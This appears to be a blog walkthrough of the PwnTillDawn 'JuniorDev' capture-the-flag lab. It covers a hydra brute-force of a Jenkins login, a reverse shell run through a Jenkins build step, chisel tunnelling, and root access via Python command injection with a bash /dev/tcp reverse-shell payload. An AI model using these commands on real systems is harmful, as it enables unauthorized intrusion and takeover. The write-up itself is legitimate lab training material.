JuniorDev (10.150.150.38)

This is a vulnerable VM from PwnTillDawn.

Box: Medium, Flags to acquire = 4

Enumeration

Let's start with a quick Nmap scan.

We can see 2 ports open. SSH and an Uknown port. Let's enumerate a bit more.

Port 30609, looks to be a web service due to the robots.txt entry, let's check it out.

http://10.150.150.38:30609/robots.txt

We get a hint here for build links whatever that means. Let's visit the main web service. Here we are present with a Jenkins login portal.

After trying numerous public exploits and using Metasploit for Jenkins, none of the payloads would work, so back to the drawing board (Brute-Force time!)

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.150.150.38 -s 30609 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"

After a little while, we get a result.

Now we can log in!

FLAG69

Looking over the Jenkins application and visiting the asynchPeople page we get our first flag (http://10.150.150.38:30609/asynchPeople/)

Foothold

Remembering our hint from earlier for build (robots.txt), it becomes apparent we need to use the build options to get onto the box.

Time to make a new task. Head over to http://10.150.150.38:30609/view/all/newJob (new Item)

Enter a project name and click the Freestyle project as the type, then click ok.

On the next page enter a description in the description box (whatever you like here), then scroll down to build (there’s that hint again!).

Click Add build Step (execute shell option as we are on a Linux box)

Then add your payload. I used a simple bash reverse shell here.

Click Save, then Build Now to fire the payload (don’t forget to start a Netcat listener!)

Boom!! We get our shell

Let's make it stable so Ctrl +c won’t kick us off the box, we can use python3 for this.

Shell Upgrade (STTY)

* python3 -c 'import pty;pty.spawn("/bin/bash")'
* Press Ctrl + z
* Enter: stty raw -echo;fg
* Enter: reset
* Enter: xterm
Tip: now export the terminal to support things like ctrl +l
* Enter: export TERM=xterm

FLAG70

Now we can grab FLAG70 at /var/lib/jenkins

Enum Round 2

With the first two flags, it's time to start the enum phase again.

Checking out the system shows an open port on localhost:8080

netstat -lnptu

Using wget we can see the page and source code. Let's do that.

wget 127.0.0.1:8080

Here we can see the source code by using cat to see index.html, with a comment in the source for another FLAG. (this time in an image). We can download this with wget and send to our machine to see it.. Or we can use chisel (port forward/tunnel tool) to our machine for easy access.

Chisel (port forward)

We need to get chisel on the box we are attacking.

Chisel Download: https://github.com/jpillora/chisel

Basic user guide for tunneling: https://book.hacktricks.xyz/tunneling-and-port-forwarding

I used my own tool to transfer the files

SimpServ

I’ve added the binary in /usr/local/bin/simpserv. I have my most used tools and scripts saved in /opt/tools. This allows me to enter one command to transfer files across to the box.

cd /opt/tools && sudo simpserv

Now I can transfer with copy and paste for ease (your welcome to use whatever method you feel comfortable with)

Upload chisel to the attacking machine. Then start it up for a reverse proxy connection.

Your machine.
chisel server -p 8000 --reverse
Attacking machine.
chisel client YOURIP:8000 R:8080:127.0.0.1:8080

If you have Burp Suite running change the first R:port to connect.

Attacking machine.
eg: chisel client YOURIP:8000 R:8081:127.0.0.1:8080

Now you can open your browser and connect to the internal site via the reverse proxy.

FLAG71

Now with the proxy setup, we can finally access FLAG.png (flag71)

Privilege Escalation (Root)

Looking at the webpage on localhost port 8080. We can see 2 boxes, which take in 2 numbers and adds them together.

Having no luck with basic web attacks I started to enum the box again. I discovered a file owned by root running in the processes. (/usr/bin/python /root/mycalc/untitled.py 127.0.0.1 8080)

This gives us a hint to the exploit path (python command injection). Not knowing this it was a quick google search that leads me to this article: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1

Trying a few of the commands, I quickly gained a reverse shell.

Start another Netcat listener, I choose port 30609 as it's open already.

Listener
nc -lnvp 30906
Box 1 on the website
__import__('os').system('bash -c "bash -i >& /dev/tcp/10.66.66.238/30609 0>&1"')#

Hit Calculate to get the reverse shell.

Now we can get the final flag as Root! (FLAG72)

Thanks!! I hope you enjoyed the walkthrough.

Keep hacking the world! (Ethically!!)

Credits:

https://online.pwntilldawn.com/

https://www.wizlynxgroup.com/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store